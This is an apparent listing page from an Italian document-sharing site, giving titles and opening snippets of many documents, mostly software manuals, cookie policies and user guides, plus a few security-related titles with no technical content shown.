INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cantiwinestyle.com o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di cantiwinestyle.com
DettagliIntroduzione alla consultazione dei log tramite IceWarp Log Analyzer
Introduzione alla consultazione dei log tramite IceWarp Log Analyzer L Analizzatore di Log è uno strumento che consente un'analisi statistica e logica dei file di log generati dal server. Lo strumento
DettagliManuale LiveBox WEB ADMIN. http://www.liveboxcloud.com
2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa
DettagliTRASMISSIONE REPORTISTICA MENSILE. WEB SERVICE Descrizione procedura
TRASMISSIONE REPORTISTICA MENSILE Indice 1. DESCRIZIONE... 3 2. METODI... 4 3. IL FILE XML... 6 3.1 Descrizione contenuti del file... 7 4. COME IMMETTERE I DATI SE NON CI SONO STATE VALUTAZIONI... 12 5.
DettagliImporterONE Export Plugin Magento
ImporterONE Export Plugin Magento Indice generale 1 INTRODUZIONE...2 2 INSTALLAZIONE DEL PLUGIN...2 3 CONFIGURAZIONE...4 4 OPERAZIONI PRELIMINARI...11 1-10 1 INTRODUZIONE Questo plugin di esportazione
DettagliManuale Knowledge Base
(Riservato a rivenditori e agenzie) Versione Luglio 2010 SOMMARIO Introduzione... 2 Accesso... 2 Menu Conoscenze... 3 Bacheca... 4 Voci di menu... 5 Ricerca... 5 Ricerca Semplice... 6 Ricerca avanzata...
Dettagli[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection
---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------
DettagliPORTALE CLIENTI Manuale utente
PORTALE CLIENTI Manuale utente Sommario 1. Accesso al portale 2. Home Page e login 3. Area riservata 4. Pagina dettaglio procedura 5. Pagina dettaglio programma 6. Installazione dei programmi Sistema operativo
DettagliProgetto di Ingegneria del Software 2. SWIMv2
Progetto di Ingegneria del Software 2 2012/2013 SWIMv2 Guida al Testing Docente: Prof. Luca Mottola Davide Brambilla Antonio Caputo Paolo Caputo 1 Indice 1 Introduzione 1.1 Materiale fornito................................
DettagliExpress Import system
Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione
DettagliTeamPortal. Infrastruttura
TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal
DettagliENTRATEL: Servizio telematico Agenzia delle Entrate
ENTRATEL: Servizio telematico Agenzia delle Entrate Visualizzazione delle ricevute relative ai file inviati. Per controllare lo stato di elaborazione dei file inviati e per entrare in possesso delle ricevute
DettagliRisultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti
Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Il 27 aprile 2012 Il team della società Doctor Web continua a esaminare la prima nella storia botnet di vasta scala creata
DettagliGUIDA AL SOCIAL CARE
1 REGISTRAZIONE pag. 2 GESTIONE PROFILO pag. 3 GESTIONE APPUNTAMENTI pag. 4 GESTIONE PIANI DI CURA (RICHIESTA AUTORIZZAZIONE) pag. 5 INVIO DOCUMENTI A PRONTO CARE (es. FATTURE) pag. 6 LIQUIDAZIONI pag.
DettagliChe cosa è un VIRUS?
Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo
DettagliCookie Policy per www.lalocandadisettala.com
Policy per www.lalocandadisettala.com Uso dei cookie Il "Sito" (www.lalocandadisettala.com) utilizza i per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di www.lalocandadisettala.com.
DettagliMANUALE UTENTE Fiscali Free
MANUALE UTENTE Fiscali Free Le informazioni contenute in questa pubblicazione sono soggette a modifiche da parte della ComputerNetRimini. Il software descritto in questa pubblicazione viene rilasciato
DettagliGUIDA UTENTE PRIMA NOTA SEMPLICE
GUIDA UTENTE PRIMA NOTA SEMPLICE (Vers. 2.0.0) Installazione... 2 Prima esecuzione... 5 Login... 6 Funzionalità... 7 Prima Nota... 8 Registrazione nuovo movimento... 10 Associazione di file all operazione...
DettagliProgetto ittorario Anno scol. 2013-2014
PROGETTO ittorario Scopo: Creazione di una pagina web che mostri l orario di un docente, della classe della materia o dell aula a discrezione dell utente. Sviluppatori: Progetto sviluppato dalla classe
DettagliGestione Automatizzata delle RDL
Gestione Automatizzata delle RDL Tabella Revisioni [Version] STEFANO SPADARO [Manuale per il Tecnico] Manuale per il Tecnico per l apprendimento e l utilizzo del sito web per effettuare la compilazione
DettagliSistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO
Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Login All apertura il programma controlla che sia stata effettuata la registrazione e in caso negativo viene visualizzato un messaggio.
DettagliInformatica per la comunicazione" - lezione 13 -
Informatica per la comunicazione" - lezione 13 - Funzionamento di una password" 1: l utente tramite il suo browser richiede l accesso a una pagina del server; 2: il server richiede il nome utente e la
DettagliPULSANTI E PAGINE Sommario PULSANTI E PAGINE...1
Pagina 1 Sommario...1 Apertura...2 Visualizzazioni...2 Elenco...2 Testo sul pulsante e altre informazioni...3 Comandi...3 Informazioni...4 Flow chart...5 Comandi...6 Pulsanti Principali e Pulsanti Dipendenti...6
DettagliAta_NiAg02. Modulo Gestione Agenti
Ata_NiAg02 Modulo Gestione Agenti Il software NiAg02 consente alle aziende che utilizzano il software gestionale ATA di gestire in maniera totalmente automatizzata l acquisizione ordini e/o clienti dalla
DettagliUtilizzo della Intranet, forum privati Soci e Staff
Utilizzo della Intranet, forum privati Soci e Staff Se durante la registrazione ad Associazioni Milano avete fatto richiesta del servizio denominato Intranet, questo sarà subito disponibile già a partire
DettagliInformativa ex art. 13 D.lgs. 196/2003
Informativa ex art. 13 D.lgs. 196/2003 Gentile Utente, l Hotel Eurolido (di seguito, Società ) rispetta e tutela la Sua privacy. Ai sensi dell art. 13 del Codice della Privacy (d.lgs. 196 del 30 giugno
DettagliMINIGUIDA AI SERVIZI DI HOME BANKING
MINIGUIDA AI SERVIZI DI HOME BANKING Come operare con la propria banca usando Internet Scopo del documento: la presente miniguida è rivolta a coloro che si affacciano per la prima volta al mondo dell Home
DettagliGuida Sintetica Portale Clienti Sportello
Guida Sintetica Portale Clienti Sportello Benvenuto nel Portale Clienti Sportello Scopri come utilizzare il servizio dell Autorità che consente la gestione gratuita totalmente on-line delle richieste allo
DettagliRiepilogo delle modifiche di PA-DSS dalla versione 2.0 alla 3.0
Settore delle carte di pagamento (PCI) Standard di protezione dei dati per le applicazioni di pagamento () Riepilogo delle modifiche di dalla versione 2.0 alla 3.0 Novembre 2013 Introduzione Il presente
DettagliLa VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie
DettagliL amministratore di dominio
L amministratore di dominio Netbuilder consente ai suoi clienti di gestire autonomamente le caselle del proprio dominio nel rispetto dei vincoli contrattuali. Ciò è reso possibile dall esistenza di un
DettagliSistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani
Sistema Gestionale FIPRO Dott. Enea Belloni Ing. Andrea Montagnani Firenze, 29 Aprile 2010 Sommario della presentazione Il sistema informatico per la gestione progetti FIPRO L utente presentatore: diritti
DettagliSU Suap. IS357_03_01 Lettera aggiornamento SUAP vers. 02.00.00. Pagina 1 di 10
SU Suap OGGETTO: aggiornamento della procedura Suap dalla versione 01.03.01 alla versione 02.00.00 Nell inviarvi quanto in oggetto Vi ricordiamo che gli aggiornamenti vanno effettuati tempestivamente e
DettagliUtilizzo dei Cookie Cosa sono i cookie? A cosa servono i cookie? cookie tecnici cookie, detti analitici cookie di profilazione
Utilizzo dei Cookie Questo sito utilizza i cookie. Utilizzando il nostro sito web l'utente accetta e acconsente all utilizzo dei cookie in conformità con i termini di uso dei cookie espressi in questo
DettagliEsercizio data base "Biblioteca"
Rocco Sergi Esercizio data base "Biblioteca" Database 2: Biblioteca Testo dell esercizio Si vuole realizzare una base dati per la gestione di una biblioteca. La base dati conterrà tutte le informazioni
DettagliMODULO 5 Appunti ACCESS - Basi di dati
MODULO 5 Appunti ACCESS - Basi di dati Lezione 1 www.mondopcnet.com Modulo 5 basi di dati Richiede che il candidato dimostri di possedere la conoscenza relativa ad alcuni concetti fondamentali sui database.
DettagliI cookie sono classificati in base alla durata e al sito che li ha impostati.
1. Informativa sui cookie 1.1. Informazioni sui cookie I siti Web si avvalgono di tecniche utili e intelligenti per aumentare la semplicità di utilizzo e rendere i siti più interessanti per ogni visitatore.
DettagliA tal fine il presente documento si compone di tre distinte sezioni:
Guida on-line all adempimento Questa guida vuole essere un supporto per le pubbliche amministrazioni, nella compilazione e nella successiva pubblicazione dei dati riguardanti i dirigenti sui siti istituzionali
DettagliGuida operativa. My Legal Corner. BestSoft SOFTWARE IN SANITÀ
Guida operativa My Legal Corner BestSoft SOFTWARE IN SANITÀ Via Bono Cairoli 28/A - 20127 Milano (MI) Help desk: 02 29529140 Num. Verde da fisso: 800 978542 E-mail: info@bestsoft.it Sito Internet: www.bestsoft.it
DettagliVACANZE STUDIO - MANUALE UTENTE PER SOCIETÀ APPALTATRICI
VACANZE STUDIO - MANUALE UTENTE PER SOCIETÀ APPALTATRICI INDICE pag. INTRODUZIONE... 3 STORIA DELLE MODIFICHE APPORTATE... 3 SCOPO DEL DOCUMENTO... 3 ABBREVIAZIONI... 3 APPLICATIVO COMPATIBILE CON INTERNET
DettagliCorso basi di dati Installazione e gestione di PWS
Corso basi di dati Installazione e gestione di PWS Gianluca Di Tomassi Email: ditomass@dia.uniroma3.it Università di Roma Tre Cosa è PWS? Il Personal Web Server altro non è che una versione ridotta del
DettagliACCESSO AL SISTEMA HELIOS...
Manuale Utente (Gestione Formazione) Versione 2.0.2 SOMMARIO 1. PREMESSA... 3 2. ACCESSO AL SISTEMA HELIOS... 4 2.1. Pagina Iniziale... 6 3. CARICAMENTO ORE FORMAZIONE GENERALE... 9 3.1. RECUPERO MODELLO
DettagliWindows Web Server 2008 R2 64bit 1x Processore Intel Atom Dual (2x core 1.80 GHz) Dispositivo di memorizzazione flash esterno 32GB
LabPro ver AC Servizio RAPPORTI DI PROVA ON-LINE (disponibile dalla ver. 6C-001) SERVIZIO RAPPORTI DI PROVA ON-LINE SERVIZIO RdP on-line MODULO Base Mette a disposizione dei clienti finali del laboratorio
DettagliCome funziona il WWW. Architettura client-server. Web: client-server. Il protocollo
Come funziona il WWW Il funzionamento del World Wide Web non differisce molto da quello delle altre applicazioni Internet Anche in questo caso il sistema si basa su una interazione tra un computer client
DettagliApplication Assessment Applicazione ARCO
GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946
DettagliBanca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste
Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste versione 2.1 24/09/2015 aggiornamenti: 23-set-2015; 24-set-2015 Autore: Francesco Brunetta (http://www.francescobrunetta.it/)
Dettagli2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.
ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione
DettagliIntegrazione InfiniteCRM - MailUp
Integrazione InfiniteCRM - MailUp La funzionalità della gestione delle campagne marketing di icrm è stata arricchita con la spedizione di email attraverso l integrazione con la piattaforma MailUp. Creando
DettagliSICUREZZA. Sistemi Operativi. Sicurezza
SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema
DettagliSistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1
SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema
DettagliConsiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica
Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo
DettagliOutlook Plugin per VTECRM
Outlook Plugin per VTECRM MANUALE UTENTE Sommario Capitolo 1: Installazione e Login... 2 1 Requisiti di installazione... 2 2 Installazione... 3 3 Primo Login... 4 Capitolo 2: Lavorare con Outlook Plugin...
DettagliChe cos'è un modulo? pulsanti di opzione caselle di controllo caselle di riepilogo
Creazione di moduli Creazione di moduli Che cos'è un modulo? Un elenco di domande accompagnato da aree in cui è possibile scrivere le risposte, selezionare opzioni. Il modulo di un sito Web viene utilizzato
DettagliATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE
ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire
DettagliImporterOne Manuale Export Plugin Prestashop
ImporterOne Manuale Export Plugin Prestashop Indice generale 1 INTRODUZIONE...2 2 INSTALLAZIONE DEL PLUGIN...2 3 CONFIGURAZIONE...5 4 OPERAZIONI PRELIMINARI...11 1-10 1 INTRODUZIONE Questo plugin di esportazione
DettagliManuale di utilizzo del sito ASUWEB
Manuale di utilizzo del sito ASUWEB Versione 1.0 maggio 2007 1. Introduzione:... 3 2. Come registrarsi:... 3 3. I diversi livelli di abilitazione degli utenti:... 5 4. UTENTI IN SOLA LETTURA... 5 4.1.
DettagliLa Guida Utente Luglio 2008
La Guida Utente Luglio 2008 Indice 1. Il portale di e-learning e le modalità di accesso 3 2. Le principali funzioni 4 3. Il progetto formativo e i corsi 4 4. La comunicazione 7 2 1. Il portale di e-learning
DettagliDirezione Impresa, Lavoro e Scuola Area Produzione e Servizi - Agricoltura. Settore Calamità ed Avversità Naturali in Agricoltura
Pag. 1 di 15 Presentazione domanda iniziale e Comunicazioni Pag. 2 di 15 Sommario... 1 Dettaglio azienda... 3 Pratiche e Comunicazioni... 3 Nuova Domanda... 4 Dati identificativi... 5 Referente del Progetto...
DettagliUniversità degli Studi di Napoli Parthenope Facoltà di Scienze e Tecnologie Corso di Laurea in Informatica Generale
Università degli Studi di Napoli Parthenope Facoltà di Scienze e Tecnologie Corso di Laurea in Informatica Generale Progetto realizzato per l esame di Tecnologie Web Prof.:Raffaele Montella Studente: Vitiello
DettagliMarketing Portal. Guida all utilizzo per i concessionari. Maggio 2013
Marketing Portal Guida all utilizzo per i concessionari Maggio 2013 Marketing Portal Piaggio Il Marketing Portal Piaggio è la nuova area per la condivisione e messa a disposizione dei materiali di comunicazione
DettagliSTAMPA DI UNA PAGINA SEMPLICE
Pagina 11 copiati nel proprio sistema (disco fisso o floppy). Questa operazione è detta download o scaricamento. Il modo più semplice per effettuare un download di un file (a meno che non sia specificato
Dettagli